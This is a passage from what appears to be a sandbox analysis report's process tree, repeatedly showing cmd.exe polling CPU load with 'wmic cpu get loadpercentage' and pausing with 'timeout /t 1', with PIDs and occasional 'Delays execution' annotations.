  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4680
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3388
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1160
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3284
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4596
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1984
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2952
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1840
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2940
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1364
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4364
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3484
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4260
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:72
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3288
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4796
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2552
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3364
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1640
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:896
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3576
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1384
- - C:\Windows\system32\cmd.exe
